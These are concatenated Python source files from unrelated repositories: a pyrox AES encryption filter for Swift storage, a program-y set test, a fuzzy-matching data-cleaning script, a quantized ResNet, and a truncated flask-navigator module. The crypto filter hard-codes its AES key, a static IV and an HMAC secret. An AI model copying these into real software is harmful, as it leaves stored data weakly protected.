] | null | null | null | pyrox/portcullis/crypto_filter.py | jfwood/pyrox | 5963d4a89cb795aba777f960e9ceba7ff2244bd2 | [
"MIT"
] | null | null | null | import pyrox.filtering as filtering
from Crypto.Cipher import AES
from Crypto.Hash import HMAC, SHA256
import requests
class CryptoFilter(filtering.HttpFilter):
"""
This filter encrypts/decrypts data streamed through it on its way
to/from a Swift encrypted volume.
"""
REQUEST = 0
RESPONSE = 1
def __init__(self):
super(CryptoFilter, self).__init__()
print("initing new filter")
#TODO(jwood) Just need one of these processors.
self.processor_upload = SampleCryptoProcessor(is_encrypt=True)
self.processor_download = SampleCryptoProcessor(is_encrypt=False)
self.request_method = None
self.hmac = HMAC.new("secretkey", digestmod=SHA256.new())
@filtering.handles_request_head
def on_request_head(self, request_head):
print(">>>>>>> {}".format(self))
print('Got request head with verb: {}'.format(request_head.method))
self.request_method = request_head.method
self.url = request_head.url
self.auth_token = request_head.header("X-Auth-Token").values[0]
@filtering.handles_response_head
def on_response_head(self, response_head):
print('Got response head with status: {}'.format(response_head.status))
if response_head.status == '201' and self.request_method == 'PUT':
self.set_hmac()
hmac_digest = response_head.get_header("X-Object-Meta-Hmac-Digest")
if hmac_digest:
self.hmac_digest = hmac_digest.values[0]
@filtering.handles_request_body
def on_request_body(self, msg_part, output):
"""Must be able to handle the following conditions:
1) The input is exactly the same size as modulo-block-size blocks of
post-processed buffer output, so can send these along to the upstream server.
2) The input data is not enough to create an output block, so can't send
anything along to upstream yet.
3) The input data is not an even block size, so can only send some
blocks along to upstream (leaving some data in the buffer).
4) The input data is empty/None indicating no more data to send along
so need to send all final block(s) along to upstream.
"""
# print('Got request content chunk: {}'.format(msg_part))
# output.write(msg_part)
print(">>>>>>>>>>>>>>>>>>>> req_body - req method: {}".format(self.request_method))
if not self.request_method == 'PUT':
output.write(msg_part)
return
self.process_chunk(msg_part, self.REQUEST, output)
@filtering.handles_response_body
def on_response_body(self, msg_part, output):
print('Got response content chunk') # : {}'.format(msg_part))
print(">>>>>>>>>>>>>>>>>>>> resp_body - req method: {}".format(self.request_method))
if not self.request_method == 'GET':
output.write(msg_part)
return
self.process_chunk(msg_part, self.RESPONSE, output)
def process_chunk(self, msg_part, req_resp, output):
if msg_part:
if req_resp == self.REQUEST:
output_part = self.processor_upload.process_data(msg_part)
self.hmac.update(output_part)
else:
self.hmac.update(msg_part)
output_part = self.processor_download.process_data(msg_part)
if output_part:
print("!!!!! Output chunk...message length {}".format(len(msg_part))) # .format(output_part))
output.write(output_part)
else:
print("!!!!! Not enough data for message length {}".format(len(msg_part)))
output.write("")
else:
if req_resp == self.REQUEST:
print('finishing request')
output_part = self.processor_upload.finish()
else:
print('finishing response')
output_part = self.processor_download.finish()
# this stuff isn't being invoked right now
print('done downloading. hmac should be {}'.format(self.hmac_digest))
print('done downloading. hmac is {}'.format(self.hmac.hexdigest()))
print("!!!!! Final: {}".format(output_part))
output.write(output_part)
def set_hmac(self):
print("!!!!! start set hmac")
url = "https://storage101.dfw1.clouddrive.com:443" + self.url
headers = {"X-Object-Meta-Hmac-Digest": self.hmac.hexdigest(),
"X-Auth-Token": self.auth_token}
requests.post(url, headers=headers)
print("!!!!! end set hmac")
#TODO(jwood) Consider adding a base Processor class, that this one extends?
class SampleCryptoProcessor(object):
def __init__(self, is_encrypt, block_size_bytes=16):
self.block_size_bytes = block_size_bytes
key = 'sixteen_byte_key'
iv = 'sixteen_byte_iv!'
self.block_method = self._encrypt_block if is_encrypt else self._decrypt_block
self.encryptor = AES.new(key, AES.MODE_CBC, iv)
self.decryptor = AES.new(key, AES.MODE_CBC, iv)
self.last_block = ''
self.is_encrypt = is_encrypt
def process_data(self, data):
"""Accept and process the input 'data' block. Return an 'output' that
is a modulo of this processor's block size, which may not be evenly
aligned with the input data's size.
"""
buff = ''.join([self.last_block, data])
len_buff = len(buff)
if len_buff <= self.block_size_bytes:
self.last_block = buff
return ''
len_buff_modulo = len_buff - (len_buff % self.block_size_bytes)
if not len_buff % self.block_size_bytes:
len_buff_modulo -= self.block_size_bytes
self.last_block = buff[len_buff_modulo:]
output = self.block_method(buff[:len_buff_modulo])
return output
def finish(self):
"""Indicate that we are finished using this data structure, so need to output based on existing buffer data."""
if self.is_encrypt:
output = self._pad(self.last_block)
output = self.block_method(output)
else:
output = self.block_method(self.last_block)
output = self._strip_pad(output)
self.last_block = ''
return output
def _encrypt_block(self, block):
block = self.encryptor.encrypt(block)
return block
def _decrypt_block(self, block):
return self.decryptor.decrypt(block)
def _pad(self, unencrypted):
"""Adds padding to unencrypted byte string."""
pad_length = self.block_size_bytes - (
len(unencrypted) % self.block_size_bytes
)
return unencrypted + (chr(pad_length) * pad_length)
def _strip_pad(self, unencrypted):
pad_length = ord(unencrypted[-1:])
unpadded = unencrypted[:-pad_length]
return unpadded
| 40.283237 | 119 | 0.62735 |
ace8cb9c0d4537b36303139a501701b8b45bc1e3 | 4,812 | py | Python | test/programytest/mappings/test_sets.py | motazsaad/fit-bot-fb-clt | 580477aa1ec91855b621d9ae276f2705962f6a87 | [
"MIT"
] | 5 | 2018-08-21T00:13:45.000Z | 2018-09-01T20:00:55.000Z | test/programytest/mappings/test_sets.py | motazsaad/fit-bot-fb-clt | 580477aa1ec91855b621d9ae276f2705962f6a87 | [
"MIT"
] | 1 | 2018-09-12T18:30:17.000Z | 2018-09-12T18:30:17.000Z | test/programytest/mappings/test_sets.py | motazsaad/fit-bot-fb-clt | 580477aa1ec91855b621d9ae276f2705962f6a87 | [
"MIT"
] | 5 | 2018-08-21T00:08:36.000Z | 2018-09-23T06:11:04.000Z | import unittest
import os
from programy.mappings.sets import SetCollection
from programy.storage.factory import StorageFactory
from programy.storage.stores.file.config import FileStorageConfiguration
from programy.storage.stores.file.engine import FileStorageEngine
from programy.storage.stores.file.config import FileStoreConfiguration
class SetTests(unittest.TestCase):
def test_initialise_collection(self):
collection = SetCollection()
self.assertIsNotNone(collection)
self.assertIsNotNone(collection.sets)
self.assertIsNotNone(collection.stores)
def test_collection_operations(self):
collection = SetCollection()
collection.add_set("TESTSET", {"A": [["A", "B", "C"]], "D": [["D"]], "E": [["E", "F"]]}, "teststore")
collection.add_set("TESTSET2", {"1": [["1", "2", "3"]], "4": [["4"]], "5": [["5", "6"]]}, "teststore")
self.assertIsNotNone(collection.sets)
self.assertIsNotNone(collection.stores)
self.assertTrue(collection.contains("TESTSET"))
self.assertTrue(collection.contains("TESTSET2"))
self.assertFalse(collection.contains("TESTSET3"))
self.assertEqual(collection.store_name("TESTSET"), "teststore")
aset = collection.set("TESTSET")
self.assertIsNotNone(aset)
self.assertEqual(6, collection.count_words_in_sets())
collection.remove("TESTSET2")
self.assertTrue(collection.contains("TESTSET"))
self.assertFalse(collection.contains("TESTSET2"))
self.assertFalse(collection.contains("TESTSET3"))
collection.empty()
self.assertIsNotNone(collection.sets)
self.assertIsNotNone(collection.stores)
self.assertFalse(collection.contains("TESTSET"))
self.assertIsNone(collection.set("TESTSET"))
self.assertNotEquals(collection.store_name("TESTSET"), "teststore")
def test_load_from_file(self):
storage_factory = StorageFactory()
file_store_config = FileStorageConfiguration()
file_store_config._sets_storage = FileStoreConfiguration(dirs=[os.path.dirname(__file__) + os.sep + "test_files" + os.sep + "sets"])
storage_engine = FileStorageEngine(file_store_config)
storage_factory._storage_engines[StorageFactory.SETS] = storage_engine
storage_factory._store_to_engine_map[StorageFactory.SETS] = storage_engine
collection = SetCollection()
self.assertIsNotNone(collection)
collection.load(storage_factory)
self.assertIsNotNone(collection._sets)
self.assertEqual(len(collection._sets), 1)
self.assertIsNotNone(collection._stores)
self.assertEqual(len(collection._stores), 1)
self.assertTrue("TEST_SET" in collection._sets)
self.assertTrue("TEST_SET" in collection._stores)
self.assertTrue(collection.contains('TEST_SET'))
aset = collection.set('TEST_SET')
self.assertIsNotNone(aset)
values = aset['AIR']
self.assertIsNotNone(values)
self.assertTrue(['Air', 'Force', 'blue'] in values)
def test_reload_from_file(self):
storage_factory = StorageFactory()
file_store_config = FileStorageConfiguration()
file_store_config._sets_storage = FileStoreConfiguration(dirs=[os.path.dirname(__file__) + os.sep + "test_files" + os.sep + "sets"])
storage_engine = FileStorageEngine(file_store_config)
storage_factory._storage_engines[StorageFactory.SETS] = storage_engine
storage_factory._store_to_engine_map[StorageFactory.SETS] = storage_engine
collection = SetCollection()
self.assertIsNotNone(collection)
collection.load(storage_factory)
self.assertIsNotNone(collection._sets)
self.assertEqual(len(collection._sets), 1)
self.assertIsNotNone(collection._stores)
self.assertEqual(len(collection._stores), 1)
self.assertTrue("TEST_SET" in collection._sets)
self.assertTrue("TEST_SET" in collection._stores)
self.assertTrue(collection.contains('TEST_SET'))
aset = collection.set('TEST_SET')
self.assertIsNotNone(aset)
self.assertTrue(['Air', 'Force', 'blue'] in aset['AIR'])
collection.reload(storage_factory, "TEST_SET" )
self.assertIsNotNone(collection._sets)
self.assertEqual(len(collection._sets), 1)
self.assertIsNotNone(collection._stores)
self.assertEqual(len(collection._stores), 1)
self.assertTrue("TEST_SET" in collection._sets)
self.assertTrue("TEST_SET" in collection._stores)
self.assertTrue(collection.contains('TEST_SET'))
self.assertIsNotNone(collection.set('TEST_SET'))
self.assertTrue(['Air', 'Force', 'blue'] in collection.set('TEST_SET')['AIR'])
| 37.302326 | 140 | 0.693682 |
ace8cbe2d4c4184c41e9dffaffce0be1fac37820 | 1,950 | py | Python | Data Cleaning/Class 5 - Inconsistent Data Entry.py | haoweii0215/Kaggle-Courses | 57974b2e6618b1125e030791320c649dda2fc783 | [
"MIT"
] | null | null | null | Data Cleaning/Class 5 - Inconsistent Data Entry.py | haoweii0215/Kaggle-Courses | 57974b2e6618b1125e030791320c649dda2fc783 | [
"MIT"
] | null | null | null | Data Cleaning/Class 5 - Inconsistent Data Entry.py | haoweii0215/Kaggle-Courses | 57974b2e6618b1125e030791320c649dda2fc783 | [
"MIT"
] | null | null | null | # Inconsistent Data Entry
import pandas as pd
import numpy as np
import fuzzywuzzy
from fuzzywuzzy import process
import chardet
### read in all our data
professors = pd.read_csv("../Data/Pakistan Intellectual Capital.csv")
### get all the unique values in the 'Country' column
countries = professors['Country'].unique()
### sort them alphabetically and then take a closer look
countries.sort()
### convert to lower case
professors['Country'] = professors['Country'].str.lower()
### remove trailing white spaces
professors['Country'] = professors['Country'].str.strip()
### get all the unique values in the 'Country' column
countries = professors['Country'].unique()
### get the top 10 closest matches to "south korea"
matches = fuzzywuzzy.process.extract("south korea", countries, limit=10, scorer=fuzzywuzzy.fuzz.token_sort_ratio)
### function to replace rows in the provided column of the provided dataframe
### that match the provided string above the provided ratio with the provided string
def replace_matches_in_column(df, column, string_to_match, min_ratio=47):
### get a list of unique strings
strings = df[column].unique()
### get the top 10 closest matches to our input string
matches = fuzzywuzzy.process.extract(string_to_match, strings, limit=10, scorer=fuzzywuzzy.fuzz.token_sort_ratio)
### only get matches with a ratio > 90
close_matches = [matches[0] for matches in matches if matches[1] >= min_ratio]
### get the rows of all the close matches in our dataframe
rows_with_matches = df[column].isin(close_matches)
### replace all rows with close matches with the input matches
df.loc[rows_with_matches, column] = string_to_match
### let us know the function's done
print("All done!")
### use the function we just wrote to replace close matches to "south korea" with "south korea"
replace_matches_in_column(df=professors, column='Country', string_to_match="south korea")
| 36.111111 | 117 | 0.745641 |
ace8cc9b39a44d1eb0cf07cc2a3be83874aa9288 | 19,528 | py | Python | tools/pytorch-quantization/model/resnet.py | malithj/TensorRT | 48605d4b5673df89110cf41249ad007259d7c34a | [
"Apache-2.0"
] | null | null | null | tools/pytorch-quantization/model/resnet.py | malithj/TensorRT | 48605d4b5673df89110cf41249ad007259d7c34a | [
"Apache-2.0"
] | null | null | null | tools/pytorch-quantization/model/resnet.py | malithj/TensorRT | 48605d4b5673df89110cf41249ad007259d7c34a | [
"Apache-2.0"
] | null | null | null | #
# Copyright (c) 2021, NVIDIA CORPORATION. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import torch
from torch import Tensor
import torch.nn as nn
from torch.hub import load_state_dict_from_url
from typing import Type, Any, Callable, Union, List, Optional
from pytorch_quantization import quant_modules
from pytorch_quantization import nn as quant_nn
__all__ = [
'ResNet', 'resnet18', 'resnet34', 'resnet50', 'resnet101', 'resnet152', 'resnext50_32x4d', 'resnext101_32x8d',
'wide_resnet50_2', 'wide_resnet101_2'
]
model_urls = {
'resnet18': 'https://download.pytorch.org/models/resnet18-5c106cde.pth',
'resnet34': 'https://download.pytorch.org/models/resnet34-333f7ec4.pth',
'resnet50': 'https://download.pytorch.org/models/resnet50-19c8e357.pth',
'resnet101': 'https://download.pytorch.org/models/resnet101-5d3b4d8f.pth',
'resnet152': 'https://download.pytorch.org/models/resnet152-b121ed2d.pth',
'resnext50_32x4d': 'https://download.pytorch.org/models/resnext50_32x4d-7cdf4587.pth',
'resnext101_32x8d': 'https://download.pytorch.org/models/resnext101_32x8d-8ba56ff5.pth',
'wide_resnet50_2': 'https://download.pytorch.org/models/wide_resnet50_2-95faca4d.pth',
'wide_resnet101_2': 'https://download.pytorch.org/models/wide_resnet101_2-32ee1156.pth',
}
def conv3x3(in_planes: int,
out_planes: int,
stride: int = 1,
groups: int = 1,
dilation: int = 1,
quantize: bool = False) -> nn.Conv2d:
"""3x3 convolution with padding"""
if quantize:
return quant_nn.QuantConv2d(in_planes,
out_planes,
kernel_size=3,
stride=stride,
padding=dilation,
groups=groups,
bias=False,
dilation=dilation)
else:
return nn.Conv2d(in_planes,
out_planes,
kernel_size=3,
stride=stride,
padding=dilation,
groups=groups,
bias=False,
dilation=dilation)
def conv1x1(in_planes: int, out_planes: int, stride: int = 1, quantize: bool = False) -> nn.Conv2d:
"""1x1 convolution"""
if quantize:
return quant_nn.QuantConv2d(in_planes, out_planes, kernel_size=1, stride=stride, bias=False)
else:
return nn.Conv2d(in_planes, out_planes, kernel_size=1, stride=stride, bias=False)
class BasicBlock(nn.Module):
expansion: int = 1
def __init__(self,
inplanes: int,
planes: int,
stride: int = 1,
downsample: Optional[nn.Module] = None,
groups: int = 1,
base_width: int = 64,
dilation: int = 1,
norm_layer: Optional[Callable[..., nn.Module]] = None,
quantize: bool = False) -> None:
super(BasicBlock, self).__init__()
if norm_layer is None:
norm_layer = nn.BatchNorm2d
if groups != 1 or base_width != 64:
raise ValueError(
'BasicBlock only supports groups=1 and base_width=64')
if dilation > 1:
raise NotImplementedError(
"Dilation > 1 not supported in BasicBlock")
# Both self.conv1 and self.downsample layers downsample the input when stride != 1
self.conv1 = conv3x3(inplanes, planes, stride, quantize=quantize)
self.bn1 = norm_layer(planes)
self.relu = nn.ReLU(inplace=True)
self.conv2 = conv3x3(planes, planes, quantize=quantize)
self.bn2 = norm_layer(planes)
self.downsample = downsample
self.stride = stride
self._quantize = quantize
if self._quantize:
self.residual_quantizer = quant_nn.TensorQuantizer(
quant_nn.QuantConv2d.default_quant_desc_input)
def forward(self, x: Tensor) -> Tensor:
identity = x
out = self.conv1(x)
out = self.bn1(out)
out = self.relu(out)
out = self.conv2(out)
out = self.bn2(out)
if self.downsample is not None:
identity = self.downsample(x)
if self._quantize:
out += self.residual_quantizer(identity)
else:
out += identity
out = self.relu(out)
return out
class Bottleneck(nn.Module):
# Bottleneck in torchvision places the stride for downsampling at 3x3 convolution(self.conv2)
# while original implementation places the stride at the first 1x1 convolution(self.conv1)
# according to "Deep residual learning for image recognition"https://arxiv.org/abs/1512.03385.
# This variant is also known as ResNet V1.5 and improves accuracy according to
# https://ngc.nvidia.com/catalog/model-scripts/nvidia:resnet_50_v1_5_for_pytorch.
expansion: int = 4
def __init__(self,
inplanes: int,
planes: int,
stride: int = 1,
downsample: Optional[nn.Module] = None,
groups: int = 1,
base_width: int = 64,
dilation: int = 1,
norm_layer: Optional[Callable[..., nn.Module]] = None,
quantize: bool = False) -> None:
super(Bottleneck, self).__init__()
if norm_layer is None:
norm_layer = nn.BatchNorm2d
width = int(planes * (base_width / 64.)) * groups
# Both self.conv2 and self.downsample layers downsample the input when stride != 1
self.conv1 = conv1x1(inplanes, width, quantize=quantize)
self.bn1 = norm_layer(width)
self.conv2 = conv3x3(width, width, stride, groups,
dilation, quantize=quantize)
self.bn2 = norm_layer(width)
self.conv3 = conv1x1(width, planes * self.expansion, quantize=quantize)
self.bn3 = norm_layer(planes * self.expansion)
self.relu = nn.ReLU(inplace=True)
self.downsample = downsample
self.stride = stride
self._quantize = quantize
if self._quantize:
self.residual_quantizer = quant_nn.TensorQuantizer(
quant_nn.QuantConv2d.default_quant_desc_input)
def forward(self, x: Tensor) -> Tensor:
identity = x
out = self.conv1(x)
out = self.bn1(out)
out = self.relu(out)
out = self.conv2(out)
out = self.bn2(out)
out = self.relu(out)
out = self.conv3(out)
out = self.bn3(out)
if self.downsample is not None:
identity = self.downsample(x)
if self._quantize:
out += self.residual_quantizer(identity)
else:
out += identity
out = self.relu(out)
return out
class ResNet(nn.Module):
def __init__(self,
block: Type[Union[BasicBlock, Bottleneck]],
layers: List[int],
quantize: bool = False,
num_classes: int = 1000,
zero_init_residual: bool = False,
groups: int = 1,
width_per_group: int = 64,
replace_stride_with_dilation: Optional[List[bool]] = None,
norm_layer: Optional[Callable[..., nn.Module]] = None) -> None:
super(ResNet, self).__init__()
self._quantize = quantize
if norm_layer is None:
norm_layer = nn.BatchNorm2d
self._norm_layer = norm_layer
self.inplanes = 64
self.dilation = 1
if replace_stride_with_dilation is None:
# each element in the tuple indicates if we should replace
# the 2x2 stride with a dilated convolution instead
replace_stride_with_dilation = [False, False, False]
if len(replace_stride_with_dilation) != 3:
raise ValueError("replace_stride_with_dilation should be None "
"or a 3-element tuple, got {}".format(replace_stride_with_dilation))
self.groups = groups
self.base_width = width_per_group
if quantize:
self.conv1 = quant_nn.QuantConv2d(3,
self.inplanes,
kernel_size=7,
stride=2,
padding=3,
bias=False)
else:
self.conv1 = nn.Conv2d(
3, self.inplanes, kernel_size=7, stride=2, padding=3, bias=False)
self.bn1 = norm_layer(self.inplanes)
self.relu = nn.ReLU(inplace=True)
self.maxpool = nn.MaxPool2d(kernel_size=3, stride=2, padding=1)
self.layer1 = self._make_layer(block, 64, layers[0], quantize=quantize)
self.layer2 = self._make_layer(block,
128,
layers[1],
stride=2,
dilate=replace_stride_with_dilation[0],
quantize=quantize)
self.layer3 = self._make_layer(block,
256,
layers[2],
stride=2,
dilate=replace_stride_with_dilation[1],
quantize=quantize)
self.layer4 = self._make_layer(block,
512,
layers[3],
stride=2,
dilate=replace_stride_with_dilation[2],
quantize=quantize)
self.avgpool = nn.AdaptiveAvgPool2d((1, 1))
if quantize:
self.fc = quant_nn.QuantLinear(512 * block.expansion, num_classes)
else:
self.fc = nn.Linear(512 * block.expansion, num_classes)
for m in self.modules():
if isinstance(m, nn.Conv2d):
nn.init.kaiming_normal_(
m.weight, mode='fan_out', nonlinearity='relu')
elif isinstance(m, (nn.BatchNorm2d, nn.GroupNorm)):
nn.init.constant_(m.weight, 1)
nn.init.constant_(m.bias, 0)
# Zero-initialize the last BN in each residual branch,
# so that the residual branch starts with zeros, and each residual block behaves like an identity.
# This improves the model by 0.2~0.3% according to https://arxiv.org/abs/1706.02677
if zero_init_residual:
for m in self.modules():
if isinstance(m, Bottleneck):
# type: ignore[arg-type]
nn.init.constant_(m.bn3.weight, 0)
elif isinstance(m, BasicBlock):
# type: ignore[arg-type]
nn.init.constant_(m.bn2.weight, 0)
def _make_layer(self,
block: Type[Union[BasicBlock, Bottleneck]],
planes: int,
blocks: int,
stride: int = 1,
dilate: bool = False,
quantize: bool = False) -> nn.Sequential:
norm_layer = self._norm_layer
downsample = None
previous_dilation = self.dilation
if dilate:
self.dilation *= stride
stride = 1
if stride != 1 or self.inplanes != planes * block.expansion:
downsample = nn.Sequential(
conv1x1(self.inplanes, planes * block.expansion,
stride, quantize=quantize),
norm_layer(planes * block.expansion),
)
layers = []
layers.append(
block(self.inplanes, planes, stride, downsample, self.groups, self.base_width, previous_dilation,
norm_layer, self._quantize))
self.inplanes = planes * block.expansion
for _ in range(1, blocks):
layers.append(
block(self.inplanes,
planes,
groups=self.groups,
base_width=self.base_width,
dilation=self.dilation,
norm_layer=norm_layer,
quantize=quantize))
return nn.Sequential(*layers)
def _forward_impl(self, x: Tensor) -> Tensor:
# See note [TorchScript super()]
x = self.conv1(x)
x = self.bn1(x)
x = self.relu(x)
x = self.maxpool(x)
x = self.layer1(x)
x = self.layer2(x)
x = self.layer3(x)
x = self.layer4(x)
x = self.avgpool(x)
x = torch.flatten(x, 1)
x = self.fc(x)
return x
def forward(self, x: Tensor) -> Tensor:
return self._forward_impl(x)
def _resnet(arch: str, block: Type[Union[BasicBlock, Bottleneck]], layers: List[int], pretrained: bool, progress: bool,
quantize: bool, **kwargs: Any) -> ResNet:
model = ResNet(block, layers, quantize, **kwargs)
if pretrained:
state_dict = load_state_dict_from_url(
model_urls[arch], progress=progress)
model.load_state_dict(state_dict)
return model
def resnet18(pretrained: bool = False, progress: bool = True, quantize: bool = False, **kwargs: Any) -> ResNet:
r"""ResNet-18 model from
`"Deep Residual Learning for Image Recognition" <https://arxiv.org/pdf/1512.03385.pdf>`_.
Args:
pretrained (bool): If True, returns a model pre-trained on ImageNet
progress (bool): If True, displays a progress bar of the download to stderr
"""
return _resnet('resnet18', BasicBlock, [2, 2, 2, 2], pretrained, progress, quantize, **kwargs)
def resnet34(pretrained: bool = False, progress: bool = True, quantize: bool = False, **kwargs: Any) -> ResNet:
r"""ResNet-34 model from
`"Deep Residual Learning for Image Recognition" <https://arxiv.org/pdf/1512.03385.pdf>`_.
Args:
pretrained (bool): If True, returns a model pre-trained on ImageNet
progress (bool): If True, displays a progress bar of the download to stderr
"""
return _resnet('resnet34', BasicBlock, [3, 4, 6, 3], pretrained, progress, quantize, **kwargs)
def resnet50(pretrained: bool = False, progress: bool = True, quantize: bool = False, **kwargs: Any) -> ResNet:
r"""ResNet-50 model from
`"Deep Residual Learning for Image Recognition" <https://arxiv.org/pdf/1512.03385.pdf>`_.
Args:
pretrained (bool): If True, returns a model pre-trained on ImageNet
progress (bool): If True, displays a progress bar of the download to stderr
"""
return _resnet('resnet50', Bottleneck, [3, 4, 6, 3], pretrained, progress, quantize, **kwargs)
def resnet101(pretrained: bool = False, progress: bool = True, quantize: bool = False, **kwargs: Any) -> ResNet:
r"""ResNet-101 model from
`"Deep Residual Learning for Image Recognition" <https://arxiv.org/pdf/1512.03385.pdf>`_.
Args:
pretrained (bool): If True, returns a model pre-trained on ImageNet
progress (bool): If True, displays a progress bar of the download to stderr
"""
return _resnet('resnet101', Bottleneck, [3, 4, 23, 3], pretrained, progress, quantize, **kwargs)
def resnet152(pretrained: bool = False, progress: bool = True, quantize: bool = False, **kwargs: Any) -> ResNet:
r"""ResNet-152 model from
`"Deep Residual Learning for Image Recognition" <https://arxiv.org/pdf/1512.03385.pdf>`_.
Args:
pretrained (bool): If True, returns a model pre-trained on ImageNet
progress (bool): If True, displays a progress bar of the download to stderr
"""
return _resnet('resnet152', Bottleneck, [3, 8, 36, 3], pretrained, progress, quantize, **kwargs)
def resnext50_32x4d(pretrained: bool = False, progress: bool = True, quantize: bool = False, **kwargs: Any) -> ResNet:
r"""ResNeXt-50 32x4d model from
`"Aggregated Residual Transformation for Deep Neural Networks" <https://arxiv.org/pdf/1611.05431.pdf>`_.
Args:
pretrained (bool): If True, returns a model pre-trained on ImageNet
progress (bool): If True, displays a progress bar of the download to stderr
"""
kwargs['groups'] = 32
kwargs['width_per_group'] = 4
return _resnet('resnext50_32x4d', Bottleneck, [3, 4, 6, 3], pretrained, progress, quantize, **kwargs)
def resnext101_32x8d(pretrained: bool = False, progress: bool = True, quantize: bool = False, **kwargs: Any) -> ResNet:
r"""ResNeXt-101 32x8d model from
`"Aggregated Residual Transformation for Deep Neural Networks" <https://arxiv.org/pdf/1611.05431.pdf>`_.
Args:
pretrained (bool): If True, returns a model pre-trained on ImageNet
progress (bool): If True, displays a progress bar of the download to stderr
"""
kwargs['groups'] = 32
kwargs['width_per_group'] = 8
return _resnet('resnext101_32x8d', Bottleneck, [3, 4, 23, 3], pretrained, progress, quantize, **kwargs)
def wide_resnet50_2(pretrained: bool = False, progress: bool = True, quantize: bool = False, **kwargs: Any) -> ResNet:
r"""Wide ResNet-50-2 model from
`"Wide Residual Networks" <https://arxiv.org/pdf/1605.07146.pdf>`_.
The model is the same as ResNet except for the bottleneck number of channels
which is twice larger in every block. The number of channels in outer 1x1
convolutions is the same, e.g. last block in ResNet-50 has 2048-512-2048
channels, and in Wide ResNet-50-2 has 2048-1024-2048.
Args:
pretrained (bool): If True, returns a model pre-trained on ImageNet
progress (bool): If True, displays a progress bar of the download to stderr
"""
kwargs['width_per_group'] = 64 * 2
return _resnet('wide_resnet50_2', Bottleneck, [3, 4, 6, 3], pretrained, progress, quantize, **kwargs)
def wide_resnet101_2(pretrained: bool = False, progress: bool = True, quantize: bool = False, **kwargs: Any) -> ResNet:
r"""Wide ResNet-101-2 model from
`"Wide Residual Networks" <https://arxiv.org/pdf/1605.07146.pdf>`_.
The model is the same as ResNet except for the bottleneck number of channels
which is twice larger in every block. The number of channels in outer 1x1
convolutions is the same, e.g. last block in ResNet-50 has 2048-512-2048
channels, and in Wide ResNet-50-2 has 2048-1024-2048.
Args:
pretrained (bool): If True, returns a model pre-trained on ImageNet
progress (bool): If True, displays a progress bar of the download to stderr
"""
kwargs['width_per_group'] = 64 * 2
return _resnet('wide_resnet101_2', Bottleneck, [3, 4, 23, 3], pretrained, progress, quantize, **kwargs)
| 41.372881 | 119 | 0.589154 |
ace8ccb326ffa003444a05f94bdf596bc491ad16 | 6,205 | py | Python | flask_navigator/item.py | tonicbupt/flask-navigator | 7bff981e130b648068e23849141ddb800391f3ec | [
"MIT"
] | null | null | null | flask_navigator/item.py | tonicbupt/flask-navigator | 7bff981e130b648068e23849141ddb800391f3ec | [
"MIT"
] | 1 | 2015-05-12T11:50:05.000Z | 2015-05-12T11:50:05.000Z | flask_navigator/item.py | tonicbupt/flask-navigator | 7bff981e130b648068e23849141ddb800391f3ec | [
"MIT"
] | null | null | null | import collections
from flask import url_for, request
from .utils import freeze_dict
class Item(object):
"""The navigation item object.
:param label: the display label of this navigation item.
:param endpoint: the unique name of this navigation item.
If this item point to a internal url, this parameter
should be acceptable for ``url_for`` which will generate
the target url.
:param args: optional. If this parameter be provided, it will be passed to
the ``url_for`` with ``endpoint`` together.
Maybe this arguments need to be decided in the Flask app
context, then this parameter could be a function to delay the
execution.
:param url: optional. If this parameter be provided, the target url of
this navigation will be it. The ``endpoint`` and ``args`` will
not been used to generate url.
The ``endpoint`` is the identity name of this navigation item. It will be
unique in whole application. In mostly situation, it should be a endpoint
name of a Flask view function.
"""
def __init__(self, label, endpoint, args=None, url=None, sub_nav_bar=None):
self.label = label
self.endpoint = endpoint
self._args = args
self._url = url
if sub_nav_bar:
if not isinstance(sub_nav_bar, list):
sub_nav_bar = [sub_nav_bar, ]
self._sub_nav_bar = sub_nav_bar
else:
self._sub_nav_bar = []
@property
def args(self):
"""The arguments which will be passed to ``url_for``.
:type: :class:`dict`
"""
if self._args is None:
return {}
if callable(self._args):
return dict(self._args())
return dict(self._args)
@property
def url(self):
"""The final url of this navigation item.
By default, the value is generated by the :attr:`self.endpoint` and
:attr:`self.args`.
.. note::
The :attr:`url` property require the app context without a provided
config value :const:`SERVER_NAME`, because of :func:`flask.url_for`.
:type: :class:`str`
"""
if self._url is None:
return url_for(self.endpoint, **self.args)
return self._url
@property
def is_active(self):
# should check both self and sub navigators.
return self._is_self_active() or self._is_sub_nav_bar_item_active()
def _is_self_active(self):
# simply test if self is active.
# nothing to do with the sub navigators.
is_internal = (self._url is None)
has_same_endpoint = (request.endpoint == self.endpoint)
has_same_args = (request.view_args == self.args)
return is_internal and has_same_endpoint and has_same_args
def _is_sub_nav_bar_item_active(self):
# if no sub navigators are bound to self,
# then `is_active` should be related to self._is_self_active,
# so we simply return False.
if not self._sub_nav_bar:
return False
# if any sub navigators are bound,
# then self is the parent to all sub navigators.
# hence `is_active` should be related to all items in these sub navigators.
# any of which is active, the parent is then active.
return any([item.is_active for b in self._sub_nav_bar for item in b])
@property
def ident(self):
"""The identity of this item.
:type: :class:`~flask.ext.navigation.Navigation.ItemReference`
"""
return ItemReference(self.endpoint, self.args)
class ItemCollection(collections.MutableSequence,
collections.Iterable):
"""The collection of navigation items.
This collection is a mutable sequence. All items have order index, and
could be found by its endpoint name. e.g.::
c = ItemCollection()
c.append(Item(endpoint='doge'))
print(c['doge']) # output: Item(endpoint='doge')
print(c[0]) # output: Item(endpoint='doge')
print(c) # output: ItemCollection([Item(endpoint='doge')])
print(len(c)) # output: 1
c.append(Item(endpoint='lumpy', args={'num': 4}))
print(c[1]) # output: Item(endpoint='lumpy', args={'num': 4})
assert c['lumpy', {'num': 4}] is c[1]
"""
def __init__(self, iterable=None):
#: the item collection
self._items = []
#: the mapping collection of endpoint -> item
self._items_mapping = {}
#: initial extending
self.extend(iterable or [])
def __repr__(self):
return 'ItemCollection(%r)' % self._items
def __getitem__(self, index):
if isinstance(index, int):
return self._items[index]
if isinstance(index, tuple):
endpoint, args = index
else:
endpoint, args = index, {}
ident = ItemReference(endpoint, args)
return self._items_mapping[ident]
def __setitem__(self, index, item):
# remove the old reference
old_item = self._items[index]
del self._items_mapping[old_item.ident]
self._items[index] = item
